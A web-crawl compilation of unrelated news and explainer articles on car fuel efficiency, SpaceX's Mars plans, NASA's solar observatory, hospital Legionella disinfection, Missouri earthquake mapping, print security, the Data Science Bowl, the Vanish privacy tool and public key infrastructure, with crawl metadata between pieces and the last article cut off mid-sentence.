a 15 percent reduction in emissions while improving overall engine performance. Clean Diesel: Long associated with dirty, smoky cars, diesel is experiencing a rebirth. By 2013, at least 15 new vehicles from a host of manufacturers will feature diesel engines. Modern diesel engines use “clean diesel” fuel, which is the common name for ultra-low sulfur diesel. Clean diesel, according to Bosch, delivers 30 percent better fuel economy than gasoline engines and 25 percent less carbon dioxide emissions. Bosch also states that since 1990, overall emissions from diesel have been reduced by 95 percent. Diesel engines have been more fuel efficient than gasoline engines because the fuel in diesel engines is ignited in the cylinder by compression instead of a spark plug, which requires a richer mixture of fuel and air. It should be noted that Bosch has a significant stake in diesel technology as it is a German company and diesel is more commonplace in Germany. But data from the U.S. Coalition for Advanced Diesel Cars — of which Bosch is a member — supports the company’s conclusion. As stated in a white paper from the coalition: “Switching from a gasoline engine to an advanced diesel engine (turbocharged with exhaust after treatment) will improve fuel economy up to 30 percent and reduce [greenhouse gas] emissions as much as 25 percent, at an additional cost of $1,500-$2,000 per vehicle. In the last 20 years, turbochargers have overcome [a] traditional drawback of diesel engines — sluggish engine response — and have greatly improved the driving experience.” Start/Stop Systems: When an engine isn’t running, it does not use any fuel — that’s the idea behind this technology, which owners of hybrid or electric vehicles already experience. When coasting to a stop sign or waiting at a stoplight, the engine shuts itself off. These systems are more difficult to apply to internal combustion engines, where auxiliary components like air conditioning and water pumps often operate on a belt system that depends on a running engine. Furthermore, the engine starter mechanism was seen to be at risk from the dramatically increased number of engine restarts. There’s also the problem of alternators, which use engine power to generate electricity to operate other engine components. If the engine is off, those components depend entirely on batteries. Bosch is developing advanced starter mechanisms that can handle the stress of multiple engine restarts while incorporating better batteries and regenerative braking to keep componentsoperating with the engine off. Additionally electric motors can be used in place of serpentine belts to allow components to operate without engine power. Bosch estimates that start/stop technology can reduce a vehicle’s fuel consumption by 10 percent. Electric Power Steering: How can power steering affect a car’s fuel consumption? Like most other components in modern automobiles, power steering systems draw power from the engine to operate the hydraulic mechanisms needed for power steering. In many cases, power steering is a dumb system, meaning it draws power from the engine continuously, whether the system is in use or not. This places a heavy load on engines that requires more fuel consumption. Adding intelligence to the system can yield significant improvements. Most power steering systems today are either purely hydraulic or electronic-hydraulic, which uses an electric motor to pump hydraulic fluid through the system. Electronic-hydraulic systems use only 20 percent of the power that a traditional hydraulic-only system does. Fully electronic power steering dispenses with hydraulics entirely and draws less than 2 percent of the power that a traditional power steering system would. And electronic power steering is on demand, so almost no standby power is required. Electronic power steering can add 10 percent efficiency to each gallon of gas an equipped car consumes. It also reduces engine complexity and simplifies manufacturing. Better Electric Motors: Like electronic power steering, advanced electric motors for other components in a car can help reduce the load on an engine and therefore reduce the engine’s fuel consumption. Cars made today have on average about 35 electric motors that power various components, such as windshield wipers, lighting and seat adjustment. Engine cooling, air conditioning and power steering are the biggest power users. With improved engineering in the design of these motors, efficiency is being increased while size and weight are being decreased. Engineers at Bosch said that in the coming years, the number of electric motors in cars will grow from 35 to more than 50 in small cars. These changes will further reduce weight and power consumption, leading to more gains in fuel efficiency. In addition, these electric motors take up much less room in the engine compartment compared to traditional component systems, allowing engineers to make better use of available space. More space to design can lead to more aerodynamic cars, further adding to efficiency gains. So while there likely won’t be a day that the world wakes up to a brand-new propulsion system that changes everything, GM’s Martin thinks very soon we will suddenly realize how much better our cars have become. “The years will lapse and there will continue to be incremental progress that we won’t notice, until maybe in 10 years we look back and say, ‘Oh my gosh, the car I’m driving gets X mpg compared to cars from today.’ It will be gradual, yet [CAFE] is aggressive, and with any good agreement, it really pushes the hell out of us. Everybody can find something to like in it [or] something not to like in it — and in this day and age that is a rare occurrence in Washington, so we will see what happens.”
<urn:uuid:6f3fd473-025e-439e-9463-7ec0d0165a28>
CC-MAIN-2017-04
http://www.govtech.com/innovationnation/How-Will-US-Automakers-Make-Cars-More-Efficient.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285315.77/warc/CC-MAIN-20170116095125-00030-ip-10-171-10-70.ec2.internal.warc.gz
en
0.945464
2,580
2.75
3
With some technical help from NASA, aerospace company SpaceX plans to launch a mission to Mars as soon as 2018. While NASA has been sending robotic landers and orbiters to Mars and making plans to send humans to the Red Planet in the 2030s, SpaceX is planning on getting there sooner. The company, which is headed by billionaire high-tech entrepreneur Elon Musk, tweeted today, "Planning to send Dragon to Mars as soon as 2018. Red Dragons will inform overall Mars architecture, details to come." Musk then went on to tweet that the Dragon 2 spacecraft, known as Red Dragon, is designed to be able to land anywhere in the solar system. The Red Dragon Mars mission will be its first test flight. "But wouldn't recommend transporting astronauts beyond Earth-moon region," he went on to tweet. "Wouldn't be fun for longer journeys. Internal volume ~size of SUV." It's not yet clear where the spacecraft would land on Mars or what kind of payload it would carry. Musk has said in the past that he not only wants to one day send humans to Mars but he hopes to actually build cities there. "It would be just the greatest adventure ever," he said of the planned colonization project. SpaceX, based in Hawthorne, California, is under contract with NASA to send unmanned spacecraft carrying supplies to the International Space Station.The cargo includes food, mechanical parts and scientific experiments. SpaceX also has a contract with the space agency to help build the spacecraft that will launch astronauts from U.S. soil to the space station. The company's planned Mars mission is intended to help test the technologies needed to land large payloads on Mars. The technologies also are part of what the company expects to be used in its Mars colonization plan, which is set to be announced later this year. The Dragon 2 spacecraft is expected to be launched using SpaceX's Falcon Heavy rocket. According to NASA, the unmanned SpaceX mission will be part of the many steps taken to eventually get humans to Mars. "We are closer than ever before to sending American astronauts to Mars than anyone, anywhere, at any time has ever been," wrote NASA Deputy Administrator Dava Newman, in a blog post Wednesday. "In the international space community, gone are the days of the "space race" when the dominant theme was that of various nations racing against each other. Instead, we're increasingly running together." She added that NASA is "particularly excited" to work with SpaceX on this mission. In exchange for data on entry into Martian space, descent, and landing from SpaceX, NASA will offer technical support for the company's planned Mars mission. "As the saying goes, "spaceflight is hard," Newman said. "Sending astronauts to Mars, which will be one of the greatest feats of human innovation in the history of civilization, carries with it many, many puzzles to piece together. That's why we at NASA have made it a priority to reach out to partners in boardrooms, classrooms, laboratories, space agencies and even garages across our country and around the world." While NASA is aiding with this mission, it is not paying for it. SpaceX is financing the mission, although details on costs weren't available. < /p> This story, "With NASA's help, SpaceX shoots for 2018 Mars mission" was originally published by Computerworld.
<urn:uuid:9939a33d-b09b-4078-ad6e-2228370ca42a>
CC-MAIN-2017-04
http://www.itnews.com/article/3062457/space-technology/with-nasas-help-spacex-shoots-for-2018-mars-mission.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00452-ip-10-171-10-70.ec2.internal.warc.gz
en
0.962463
692
3.046875
3
The first images show a variety of activity NASA says provide never-before-seen detail of material streaming outward and away from sunspots. Others show extreme close-ups of activity on the sun's surface. The spacecraft also has made the first high-resolution measurements of solar flares in a broad range of extreme ultraviolet wavelengths. "SDO is revolutionary. It will change our understanding of the sun and its processes, which affect our lives and society. This mission will have a huge impact on science, similar to the impact of the Hubble Space Telescope on modern astrophysics," said Richard Fisher, director of the Heliophysics Division at NASA Headquarters in Washington at a news conference. Among its many duties, SDO will determine how the sun's magnetic field -which SDO scientists said never appears the same way twice -- is generated, structured and converted into violent solar events such as turbulent solar wind, solar flares and coronal mass ejections. These immense clouds of material, when directed toward Earth, can cause large magnetic storms in our planet's magnetosphere and upper atmosphere. SDO will provide critical data that will improve the ability to predict these space weather events. The SDO will provide in-depth information about the Sun's magnetic fields and space weather generated by solar flares and violent eruptions from the Sun's atmosphere known as Coronal Mass Ejections. Such powerful ejections are of particular interest because they can carry a billion tons of solar material into space at over a million kilometers per hour. Such events can expose astronauts to deadly particle doses, can disable satellites, cause power grid failures on Earth and disrupt communications. Key to the satellite's operation are three high tech telescopes: - The Helioseismic and Magnetic Imager (HMI) looks into the sun and map the plasma flows that generate magnetic fields. HMI will also map the surface of the magnetic field, NASA said. - The Atmospheric Imaging Assembly (AIA) images the solar atmosphere in multiple wavelengths that cannot be seen from the ground. The idea is that HMI and AIA will link changes on the solar surface to the sun's interior, NASA said. AIA filters cover 10 different wavelength bands, or colors, selected to reveal key aspects of solar activity. The bulk of SDO's data stream will come from these telescopes, NASA said. - The Extreme Ultraviolet Variability Experiment (EVE) measures how much radiant energy the sun emits at extreme ultraviolet wavelengths-light that is so completely absorbed by our atmosphere it can only be measured from space, NASA said. NASA launched the $808 million spacecraft Feb. 11 to study the Sun and send back what the space agency called a prodigious rush of pictures about sunspots, solar flares and a variety of other never-before-seen solar events. The idea is to get a better idea of how the Sun works and let scientists better forecast the space weather to offer earlier warnings to protect astronauts and satellites, NASA said. The Solar Dynamics Observatory will deliver high resolution images of the Sun ten times better than the average High-Definition television to help scientists understand more about the Sun and its disruptive influence on services like communications systems on Earth. Specifically, NASA says the SDO will beam back 1.5 terabytes of data every day, 24 hours a day, seven days a week. That's almost 50 times more science data than any other mission in NASA history. It's like downloading 500,000 iTunes a day, NASA stated. The satellite is placed in what NASA called a unique orbit. Unlike a geostationary orbit, which would keep the spacecraft above the same area of Earth all the time, the satellite will trace a figure-eight path above Earth, NASA said. The idea is to let SDO watch the sun almost 24 hours a day, seven days a week, for at least five years with only brief interruptions as Earth passes between the satellite and the sun, NASA said. To gather data from SDO's instruments, NASA has set up a pair of dedicated radio antennas near Las Cruces, New Mexico. The orbit will also let high resolution images be recorded every three quarters of a second, producing enough data to fill a single CD every 36 seconds, NASA said. Follow Michael Cooney on Twitter: nwwlayer8 Layer 8 Extra Check out these other hot stories:
<urn:uuid:6d1fb5b8-09fc-40f5-bcbd-f8016e7015f4>
CC-MAIN-2017-04
http://www.networkworld.com/article/2230510/security/nasa-solar-satellite-flashes-first-sun-images.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00480-ip-10-171-10-70.ec2.internal.warc.gz
en
0.91154
887
3.53125
4
Mancini B.,Geological and Environmental science | Scurti M.,Geological and Environmental science | Dormi A.,University of Bologna | Grottola A.,University of Modena and Reggio Emilia | And 2 more authors. Environmental Science and Technology | Year: 2015 Contamination of hot water distribution systems by Legionella represents a great challenge due to difficulties associated with inactivating microorganisms, preserving the water characteristics. The aim of this study was to examine over the course of 1 year in 11 fixed sites, the impact of monochloramine disinfection on Legionella, heterotrophic bacteria (36°C), Pseudomonas aeruginosa contamination, and chemical parameters of a plumbing system in an Italian hospital. Three days after installation (T0), in the presence of monochloramine concentration between 1.5 and 2 mg/L, 10/11 sites (91%) were contaminated by L. pneumophila serogroups 3 and 10. After these results, the disinfectant dosage was increased to between 6 and 10 mg/L, reducing the level of Legionella by three logarithmic unit by 2 months postinstallation (T2) until 6 months later (T3). One year later (T4), there was a significant reduction (p = 0.0002) at 8/11 (73%) sites. Our data showed also a significant reduction of heterotrophic bacteria (36°C) in 6/11 (55%) sites at T4 (p = 0.0004), by contrast the contamination of P. aeruginosa found at T0 in two sites persisted up until T4. The results of the present study show that monochloramine is a promising disinfectant that can prevent Legionella contamination of hospital water supplies. © 2015 American Chemical Society. Source
<urn:uuid:0ed29206-5d9a-4147-a5ce-359217c5d79a>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/itaca-srl-1028374/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279468.17/warc/CC-MAIN-20170116095119-00050-ip-10-171-10-70.ec2.internal.warc.gz
en
0.891789
383
2.625
3
Print security is becoming an increasingly important issue for businesses today. Because of growing cyber threats and increased legislation around privacy and data security, companies and organizations need to focus on strategies for securing their printing functions. According to InfoTrends, there are approximately 30 million printers and multifunction printing devices currently in use in the U.S. and Western Europe. Since the majority of these are connected to some kind of network, they’re just as susceptible to malware and hacker attacks as computers are. After all, they often handle sensitive documents and information, and they have the potential to provide hackers with an access route to computers on the network. Besides the fact that documents often lie unprotected in printer output trays long after the jobs have been completed, printers store information in memory that can be recalled or intercepted inappropriately. They need to be managed and protected, just like the rest of an organization’s IT infrastructure. Every industry is concerned about print security. Take healthcare, for example, where the sensitive nature of medical data—and the importance of maintaining patient privacy and confidentiality—make secure printing and scanning crucial for general practices, hospitals and clinics. Health institutions face stiff penalties for failure to comply with the requirements of the Healthcare Privacy and Portability Act of 1996 (HIPAA). In K-12 education, school staff need secure print solutions for all kinds of confidential information—from health records and psychological assessments to grade reports and test results to court orders and other legal documents related to students. Print security is also of critical importance to the public sector, which like healthcare, handles a wealth of private information and is subject to strict regulations regarding information sharing and storage. Likewise, small and midsize businesses need secure printing and scanning solutions to safeguard business-critical information and close loopholes that hackers may exploit for network access. Depending on the nature of the business, companies may also need to protect sensitive data belonging to their customers, such credit-card numbers and other financial information. There are different kinds of printer threats. Companies may not realize it, but there are actually many risks involved with printing and copying. These include: Document theft or snooping: A person can simply walk up to a printer and pick up a document that someone else has printed. Unauthorized setting changes: If a printer’s settings and controls aren't secure, someone can mistakenly or intentionally alter and re-route print jobs, open saved copies of documents, or reset the printer to its factory defaults—wiping out all of the settings. Recovering saved copies from internal storage: If a printer has an internal drive, it can store print jobs, scans, copies and faxes. If someone steals the printer, or if it’s discarded or retired before the data is properly erased, someone can recover the saved documents. Interference of network printer traffic: Hackers can eavesdrop on the traffic of your network, and capture documents that are sent from the network computers to the networked printers. Printer hacking on the network or through the Internet: A person on the network can hack into a network-connected printer fairly easily, especially if it’s an older model without updated security features or password protection. If a printer is accessible via the Internet, the field of potential hackers is virtually limitless. Attackers could send bizarre print jobs to the printer, use it to transmit faxes, change its LCD readout, alter its settings, launch denial-of-service (DoS) attacks to lock it up, or retrieve saved copies of documents. Cybercriminals might even install malware on the printer itself to control it remotely or gain access to it. Best practices for printing security. How can your customers—whatever industry they’re in—ensure that their printing is secure? What advice can you offer them as their trusted business advisor and IT partner? Here are some steps that you can suggest they follow: 1) Secure the printers. Increasing the physical security of printers can help prevent document theft or snooping, unauthorized access to stored documents, and misuse of the printer's Ethernet or USB connections. Printers should be placed in an open area to discourage employees, freelancers and guests from fooling with their settings. Situating them in a somewhat visible open area that’s accessible to most users may be a better idea than sticking them in a separate room or office where they can’t be monitored as closely. Ideally, companies should consider designating separate printers for management and sensitive departments, and keep those machines secure from other employees. Physical ports should be disabled to prevent unauthorized use, and there should be controlled access to pre-printed security paper, such as checks and prescriptions, to present theft or unauthorized use. To help eliminate security breaches and also reduce printing costs, authentication and authorization should be required for access to device settings and functions. HP suggests deploying options like PIN authentication, LDAP authentication and smart cards for this purpose. Some printers also have built-in access control software. If a printer is being retired or returned when a lease is up, data should be removed so it’s not left in the device’s memory. To prevent data breaches, make sure that the device’s hard disk is erased, destroyed or removed before it’s retired. Finally, hard copies of documents shouldn’t be neglected, and sensitive papers should be shredded when they’re no longer needed. 2) Secure the data. Sensitive data is vulnerable as it passes through the network (or cyberspace) to the printer—and when it sits in the printer memory or storage. That’s why print jobs should be encrypted to protect data in transit in case they’re intercepted. To protect data before it reaches the device tray, users should be required to authenticate themselves to the printers before any pages will print. Then, once the printing is completed, the document—and even data about the completed job—should not be stored on the printer. 3) Protect the printed documents. It’s all too common in an office to go to pick up a printout and find multiple documents left in the printer tray or sitting near it. These documents can be viewed or carried off by anyone, creating a security risk. There is a way this can be prevented. If a printer has the capability, activate pull or push printing to reduce unclaimed documents. Users print to a secure network, authenticate themselves and then retrieve jobs as necessary. 4) Monitor and manage the print environment. There are tools and utilities that can help track and record print jobs to monitor usage and audit printing practices—to help companies identify workers who may be abusing their print privileges or ignoring company security policies. These tools can also pinpoint specific areas where companies can reduce print jobs and save money. 5) Update and upgrade printers Advise your customers to keep their printers’ firmware and drivers up to date. Often updates add new or improved security features, patch known security holes, and fix other problems. By taking the proper steps, your customers can help ensure the security of their printers and copiers, so printing function remains a business asset and not a liability.
<urn:uuid:3cebf5ef-443b-49a5-9349-3953a743e19a>
CC-MAIN-2017-04
http://www.ingrammicroadvisor.com/hpprint/strategies-to-ensure-secure-printing
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00370-ip-10-171-10-70.ec2.internal.warc.gz
en
0.922338
1,482
2.65625
3
Using Data Science to Solve Society's ProblemsBy Samuel Greengard | Posted 2016-04-05 Email Print In the Data Science Bowl, researchers work on real problems to develop solutions that will benefit society. This year's competition focused on heart disease. Over the last decade, data science has evolved from a promising idea into a mainstream tool that businesses and others use to take products and services to an entirely different level. Of course, data science is also valuable for addressing a growing array of problems in areas including medicine and biology. "The advances in the field are profound," observes Steven Mills, a principal and data science executive leader at management and IT consulting firm Booz Allen Hamilton. "Data science now touches almost every aspect of our lives." One of the offshoots of this is the just completed Data Science Bowl, a 90-day open competition that the organization launched last year in collaboration with data science organization Kaggle. This year's topic, "Transforming How We Diagnose Heart Disease," attracted 993 participants and involved 1,392 algorithms. The winning algorithm was built by Qi Liu and Tencia Lee, hedge fund analysts and self-described "quants" (experts in quantitative analysis). They have no medical experience, but they were able to create an algorithm that can diagnose heart disease from an MRI scan in real time. Currently, it requires 20 minutes for a doctor to analyze the scan. This technique could also trim medical costs and enable new research methods. The National Institutes of Health and Children's National Medical Center contributed data for the project. Chip maker Nvidia contributed an additional sum to the cash prize, which reached $125,000—up from $100,000 in 2015. An Algorithm to Monitor Ocean Health Last year, teams examined the topic "Assessing Ocean Health at a Massive Speed & Scale." Oceanographers from Oregon State University's Hartfield Marine Science Center supplied the data. For that competition, participants examined more than 100,000 images in the search for an algorithm that would allow researchers to monitor ocean health at a speed and scale never before possible. A team from Ghent University (which finished in second place this year) captured the top prize with an algorithm that automatically classifies more than 100,000 underwater images of plankton. The Data Science Bowl is designed to increase awareness about data science and to encourage people to go into the field. Yet, it's also about focusing attention on real-world issues and problems. "What is compelling about the competition is that there are researchers from around the world working on a very real problem with very real benefits to society," Mills explains. "Although the prize money is substantial, most people enter the competition because they are passionate about data science and making the world a better place. Many of the participants are passionate about what they do, and they are eager to contribute to society." The contest also benefits Booze Allen Hamilton and Kaggle, which compete for a limited number of data scientists. In addition to the Data Science Bowl, about once per quarter, Booz Allen Hamilton holds internal events and competitions designed to help its 600 data scientists grow professionally and solve other social problems, ranging from pet adoption to poverty. "It has become imperative for companies to have data scientists focused on complex problems," Mills points out. "These events are an opportunity to promote learning and knowledge sharing, while addressing real issues and problems."
<urn:uuid:c2636870-ed9b-4be0-9374-2b730f8c9295>
CC-MAIN-2017-04
http://www.baselinemag.com/innovation/using-data-science-to-solve-societys-problems.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282932.75/warc/CC-MAIN-20170116095122-00278-ip-10-171-10-70.ec2.internal.warc.gz
en
0.94944
694
2.828125
3
Privacy Tool Makes Internet Postings VanishThe open source tool called Vanish encrypts any text that's entered into a browser and scatters it, in disappearing pieces, across a network. In a gift to those who yearn to take back a hastily sent e-mail or an online comment, a tool was released Thursday makes text on the Web disappear. Called Vanish, the open source tool is available as a stand-alone application or a free plug-in for Mozilla's Firefox browser. It works with any text that's entered into a browser -- Web-based e-mail or chat services, and social networking sites such as Facebook, or Google Docs. Private information is scattered all over the Web, and that situation concerns both privacy advocates and casual Web users. There are no consistent rules for how data is stored, where it is stored, or when, if ever, it is destroyed. One of the most frequent questions received by the California Office of Privacy Protection, according to the office, is how people can get information about themselves off the Web. Often, the answer is that they can't. "And as we transition to a future based on cloud computing, where enormous, anonymous datacenters run the vast majority of our applications and store nearly all of our data, we will lose even more control," said Hank Levy, chairman of department the computer science and engineering at the University of Washington and one of the authors of an academic paper on Vanish that will be presented at the USENIX Security Symposium next month. Vanish allows users to specify that all copies of any text-based data they're creating disappear in a certain amount of time. The software takes advantage of the same peer-to-peer networks that allow people to share music files online. It encrypts data, breaks the encryption key into pieces and scatters them on machines across the network. Since machines are constantly joining and leaving peer-to-peer networks, pieces of the key disappear and it can't be reconstructed. There are caveats to using Vanish -- one is that both the user and the recipient of any posting must be using the software for it to work. University of Washington researchers also warn that Vanish is a prototype, which means it may have bugs, and that it's "ahead of the law" in how it should be used. Users who are involved in a lawsuit, for example, should be careful when using Vanish if any information they're creating needs to be preserved. Supporters of the research that led to Vanish include the National Science Foundation, the Alfred P. Sloan Foundation and Intel. More information on the project is available here. InformationWeek Analytics is conducting a survey on Windows 7 adoption, to determine whether users are sticking with XP or investigating Mac OS, Linux, or virtual desktops. The poll takes 5 minutes to complete; please participate by clicking here, through July 24.
<urn:uuid:f7fa31f2-c8d0-4712-9d7f-4a0a432486b5>
CC-MAIN-2017-04
http://www.darkreading.com/risk-management/privacy-tool-makes-internet-postings-vanish/d/d-id/1081625
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281492.97/warc/CC-MAIN-20170116095121-00059-ip-10-171-10-70.ec2.internal.warc.gz
en
0.943028
595
2.53125
3
One of the largest earthquakes in history occurred in the New Madrid Seismic Zone on Feb. 7, 1812. The earthquake exceeded the magnitude of California's Great 1906 San Francisco Earthquake. Scientists believe it would have registered greater than magnitude 7.5. The New Madrid Seismic Zone is located in Southeastern Missouri, Northeastern Arkansas, Western Tennessee, Western Kentucky and Southern Illinois. Southwestern Indiana and Northwestern Mississippi are also close enough to receive significant shaking from large earthquakes occurring in the zone. The New Madrid Seismic Zone is the most active seismic area in the United States east of the Rocky Mountains. More than 200 small earthquakes occur each year along this zone. Nearly 200 years of population growth in the region, which includes metropolitan areas such as St. Louis and Memphis, means that a repeat of the 1812 earthquake could cause considerably more damage. "A similar size earthquake occurring along this zone in this century has the potential to significantly impact Missouri," according to Dave Overhoff, geo-hazards geologist with the Missouri Department of Natural Resources . Because of the proximity to the New Madrid Seismic Zone, portions of the St. Louis area are at risk for damages or injuries from a major earthquake. Last weekend, geologists with the Missouri Department of Natural Resources met with State Farm Insurance executives at the department's St. Louis regional office to accept a check for $26,000 in support of an earthquake hazard mapping project under way at the department's Division of Geology and Land Survey in Rolla. The partnership between the department and State Farm Insurance will further the department's work to create detailed surficial materials maps for the Greater St. Louis area. Surficial materials mapping comprises the first phase of an earthquake hazard map. The hazards maps will identify the various areas at higher and lower risk for ground acceleration or amplified ground shaking. All the information and maps generated by the project will be made available to anyone interested in this type of information. The St. Louis Area Earthquake Hazards Mapping Project is a cooperative effort by the Department of Natural Resources, the Missouri University of Science and Technology Natural Hazards Mitigation Institute, the Illinois Geological Survey, the Central U.S. Earthquake Consortium emergency managers, Central United States Earthquake Consortium State Geologists and the U.S. Geological Survey in Memphis. "We are pleased to partner with State Farm Insurance on this important project," said Mimi Garstang, Division of Geology and Land Survey director and state geologist. "The additional funds will supplement federal and state dollars contributing to this effort. Predicting an earthquake is nearly impossible, but we do know that portions of the St. Louis region have varying degrees of risk. Engineers, developers, emergency planners and responders and the general public can make better decisions once this project is completed." When damaging earthquakes occur, movement of the ground seldom is the actual cause of death or injury. Most casualties result from partial building collapses, falling objects and debris, such as toppling chimneys, falling bricks, ceiling plaster and light fixtures. "When we know where the areas of highest risk are located, we can work to minimize this type of impact," said Garstang.
<urn:uuid:7f5e48da-5aac-4f35-83a5-b18e88fb0224>
CC-MAIN-2017-04
http://www.govtech.com/geospatial/Missouri-Announces-Partnership-in-Earthquake-Hazard.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280485.79/warc/CC-MAIN-20170116095120-00179-ip-10-171-10-70.ec2.internal.warc.gz
en
0.931571
645
3.40625
3
Public Key Infrastructure: Invisibly Protecting Your Digital Assets Your company is negotiating a big deal with a partner, making you a bit nervous about the security of exchanging documents via email. There is a non-disclosure agreement in place, but you'd like to be absolutely certain that only the recipients can see the plans for your company's new product initiative. When the partner emails their agreement to the final version of the proposed deal, you also want to be able to prove absolutely that the email really is from them. Is there a proven technology that can fulfill both needs? Public Key Infrastructure (PKI) can handle these requirements and more. You may already be using PKI without knowing it if you have relied on certificates or "certs" to identify a web server or to confirm the identity of external websites. It is a critical technology for the Internet and is used in applications as diverse as e-commerce and VPNs. Let's explore the world of PKI cryptography to learn about keys, signatures, and certificates, and to see how PKI can benefit you and protect your company's valuable digital assets. You don't need to be an expert in encryption to deploy PKI in your operation, but there are a few key concepts and components to understand. PKI is a powerful technology that employs cryptography to provide two important capabilities, privacy and authentication. The cryptographic procedures, or algorithms, use two keys to encrypt information. This is called asymmetric cryptography. Compared with conventional (symmetric) cryptography, which uses only one key, it is easier to distribute keys, making PKI much simpler and more practical to deploy. Keys are digital values used to encrypt and decrypt information. A PKI system uses keys in pairs. One key is private and kept secret by its owner. The other key is public and can be freely shared. When you encrypt a document with someone else's public key, only that person can decrypt it, since only he or she has the corresponding private key. This is how PKI provides privacy. PKI keys are chosen and stored differently than computer passwords. First, a private key is created. The private key is a random binary number that is generated and used inside a computer or specialized hardware device. A private key is never chosen, seen, or created by its owner. Once the private key is determined, the corresponding public key is computed based on the value of the private key. PKI works because it is extraordinarily difficult -- impractical by any currently available means -- to go back the other way. Keys can be as short or as long as needed. The length of keys is measured in bits. Long keys take more time to process, but offer correspondingly more protection. The most important considerations in choosing the length of the key are the overall value of the information to be protected and how long that information will have value. The greater the length of the key, the more computation would be required to determine the private key from the public key. A key should be long enough that the information would be worthless by the time the private key could be computed. As time goes by, and as computers become increasingly faster, it will be necessary to use correspondingly longer keys. Signatures are digital values that are computed from a key and the information being signed. When you sign a document with your private key, anyone can use your public key to decrypt the signature. This proves the document is from you. It is how PKI provides authentication. If you signed a second document with the same private key, the second signature would be different, which means a would-be forger cannot simply copy a signature from one document to another. In organizations or situations where security is a major concern and many documents are signed and/or encrypted, the key pair used for signing is different from the key pair used for encrypting. This is because a key pair used for signing may need to have a very long lifetime compared with a key pair used for encryption. Certificates are a kind of digital ID card that use your public key instead of your photo. Being sure of the other party's identity is just as important online as it is in traditional transactions. The idea behind certificates is that if you trust the identity, honesty, and procedures of certificate issuer "Jean," and "Jean" vouches for the identity of "Chris," you can trust that "Chris" is really "Chris" and not an impersonator. In this example, Jean is acting as a certificate authority (CA). In addition to a public key, the certificate includes other information to identify its owner, as well as a timestamp that says when the certificate will expire. In the example above, the certificate would be signed by Jean using Jean's private key. Decrypting the certificate's signature with Jean's public key would prove that it came from Jean, and thus authenticate Chris' public key. Anyone who trusts Jean can also trust that the public key belongs to Chris, not someone else. A Certificate Management System (CMS) is used by a CA to issue and manage certificates. Certificates may be revoked for administrative reasons, or perhaps because the private key associated with the public key in the certificate has been compromised. In this example, Jean would invalidate Chris' certificate if Chris' private key was compromised in some way. Jean's CMS places Chris' certificate on a Certificate Revocation List (CRL) when Jean revokes Chris' certificate. The two most critical things done by a CA are protecting its private key and creating and following a comprehensive, documented procedure for validating the information in the certificates it issues. If the CA's private key were compromised, nobody could trust it or the certificates purportedly signed by it. Just as important, Jean must make sure that Chris really is Chris. This is a matter outside the realm of cryptography and IT. Depending on its thoroughness, the validation procedure can be costly. A CA may issue different grades of certificates, corresponding to different procedures used to validate identity. Protecting Your PKI Assets Normally you obtain certificates by purchasing them from a CA. If you only need a few certificates, perhaps for a web server, this is certainly the preferred option. It is possible to become your own CA so you can issue your own certificates. If you want to deploy everyday-quality certificates for use inside your organization only, you need to determine the cost trade-off between this and buying the certificates. Generating certificates that are to be used or recognized by outsiders is another matter entirely. Don't even think about it unless you are a very large organization that can afford the cost of the expertise and operations, and you have a significant need to generate many strong-quality certificates. PKI operation depends on protecting private keys. Sometimes keys are generated by a computer and stored in memory and on disk. This is acceptable for everyday security. However, it is possible for someone to break into the computer -- perhaps in person, perhaps over a network -- and retrieve the private key. As a result, very sensitive information or resources need greater protection. Specialized hardware peripheral devices can provide stronger security by generating keys, signing, and decrypting information, so the private key never leaves the device. Protecting the key then becomes a matter of protecting the device from unauthorized use. It may be carried by its owner, locked up, password protected, etc. Most enterprises use PKI even without having their own certificates or keys. If you have ever received a message from your web browser about an invalid certificate, that was PKI in action. Many Virtual Private Networks (VPNs) use PKI for their security protocol. SSL (Secure Socket Layer) can use PKI to authenticate the identity of a website. When you are making a purchase over the Internet, you want to be sure that the merchant really is who it says it is. The merchant's site certificate is the proof. An alternative to SSL, S-HTTP (Secure HTTP), is another Internet protocol that uses PKI. As its name implies, S-HTTP is an extension to the Hypertext Transfer Protocol (HTTP), the protocol used by web browsers and servers. S-HTTP allows the client to send a certificate to authenticate the user, while in SSL only the server can be authenticated. S-HTTP is more likely to be used in large financial transactions and other situations where the server requires authentication from the user that is more secure than a user ID and password. There are some widely-used applications that do require you to have a certificate and/or keys. One common application of PKI is to sign email. Another is if you own or use a website that requires you to supply a certificate to allow others to authenticate your website or client. The ability to sign email is available on many popular email systems. For example, Microsoft Outlook includes the use of X.509 certificates to sign and encrypt email. X.509 is a widely implemented international standard. Outlook stores certificates you have installed or received from others. Once you get and install your certificate, you can sign email and include your certificate to authenticate that you are the author. Conversely, when you receive a certificate from someone else, Outlook learns and stores their public key. Then you can encrypt email to that person, assuring privacy. You don't have to rely on Outlook or certificate authorities to use PKI with email. PGP (Pretty Good Privacy) is a technology for PKI-based security that was originally developed at MIT and has since been commercialized and standardized by the IETF. PGP lets you sign and encrypt information without relying on CAs for certificates. You can add this capability by purchasing PGP software for email systems from Microsoft, Qualcomm (Eudora), Apple, Lotus, and Novell. PGP will interoperate with X.509. Drawbacks of PKI PKI's privacy and authentication measures work well for any two-way communication. Authentication also works well for one-to-many communication, such as signing a document or an email that many people will read. However, privacy is another matter. Remember that privacy works by having the sender encrypt the information with the recipient's public key. What if there are multiple recipients on an email message that should be kept private? There is no simple answer for this. Another drawback to encrypted email or any information is the possibility of losing your private key, which is required for decryption of information that is sent to you. The problem is worse with PKI than with symmetric encryption, because you are the only one who has your private key. A simple method to protect your private key is to back it up on a floppy. Then if you lose your hard drive, you have another way to get at your private key. On the other hand, if someone else got access to the floppy, then your private key would be compromised. You would have to have your certificates revoked and get new ones issued, along with a new private key -- a major hassle. And what about documents that might have been forged before you discovered the problem? Some systems offer stronger methods to back up keys. For example, a private key can be split into several pieces, called shares. The shares can 